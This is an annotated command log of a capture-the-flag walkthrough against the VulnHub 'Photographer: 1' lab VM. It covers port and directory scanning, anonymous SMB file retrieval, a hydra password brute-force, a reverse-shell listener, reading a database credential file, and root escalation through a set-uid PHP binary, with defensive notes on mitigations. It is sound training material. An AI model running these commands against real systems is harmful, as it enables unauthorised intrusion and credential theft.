VulnHub: Photographer: 1

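# Command transcript for the VulnHub "Photographer: 1" lab VM (10.0.2.47).
# This is a walkthrough log, not a script to run top to bottom: some lines
# are typed on the tester's machine, some at the smbclient prompt, and the
# later ones inside a shell on the target. Commands that the page had fused
# onto one line are restored one per line; nothing else is changed.

# --- Host discovery and port scanning (tester's machine) ---
# Ping sweep of the lab /24 to locate the VM.
nmap -sn 10.0.2.27/24
# Default port scan, then ports 1000 and up, skipping host discovery (-Pn).
nmap -Pn 10.0.2.47
nmap -Pn -p1000- 10.0.2.47
# Service/version/script scan of the four ports this transcript follows up on.
nmap -A -p80,139,445,8000 10.0.2.47

# --- Web enumeration on port 80 ---
nikto -h http://10.0.2.47
# Three directory brute-force passes with different wordlists. Defender's view:
# this shows up as a large burst of 404s from one source in the web logs.
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -q
gobuster dir --wordlist /usr/share/dirb/wordlists/big.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -q
gobuster dir --wordlist /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u http://10.0.2.47/ -x php,txt,html,sh,cgi,bak -q

# --- SMB enumeration ---
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.0.2.47
# No credentials are passed on the command line here, so the share appears to
# be readable without a real account (confirm against the VM). The next four
# lines are typed at the smbclient prompt, not in the local shell.
smbclient //10.0.2.47/sambashare
dir
get mailsent.txt
get wordpress.bkp.zip
exit

# --- Review of the files taken from the share (tester's machine) ---
# Finding: a mail file and a site backup sitting on a network share. Backups
# and correspondence should not live on shares readable by unauthenticated users.
cat mailsent.txt
unzip wordpress.bkp.zip
ls -la
cd wordpress
ls -la
# wp-config-sample.php is the template WordPress ships with.
cat wp-config-sample.php

# --- Password guessing against the login form on port 8000 ---
# mail.txt is not created anywhere on this page; presumably it holds the
# address(es) read from mailsent.txt. Mitigations that defeat this step:
# login rate limiting / lockout, and a password that is not in a public
# wordlist or hinted at in readable mail.
hydra -L mail.txt -P ~/Desktop/rockyou.txt 10.0.2.47 -s 8000 http-post-form "/api.php?/sessions:email=^USER^&password=^PASS^:F=Incorrect. Try again or reset your password." -V -F -u

# --- Listener (tester's machine) ---
# The step that makes the target connect back to this listener is not shown
# on the page.
rlwrap nc -lvp 443

# --- Inside the shell on the target ---
# Upgrade the bare connection to a pty.
python -c 'import pty;pty.spawn("/bin/bash");'
# NOTE(review): "htmk" looks like a typo for "html" - kept as published.
# database.php is the Koken database configuration file; credentials stored
# there are readable by whatever account the web application runs as.
cat /var/www/htmk/koken/storage/configuration/database.php
cat /home/daisa/user.txt
# List set-uid files. The same command is the standard audit for this class
# of misconfiguration.
find / -perm -u=s -type f 2>/dev/null
# Finding: the PHP interpreter is invoked here by its full path right after the
# SUID listing; a set-uid interpreter lets any local user run code with the
# file owner's privileges, and the fix is to clear the bit on /usr/bin/php7.2.
# CMD is assigned but the php line as written hard-codes '/bin/sh'.
CMD="/bin/sh"
/usr/bin/php7.2 -r "pcntl_exec('/bin/sh', ['-p']);"
whoami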
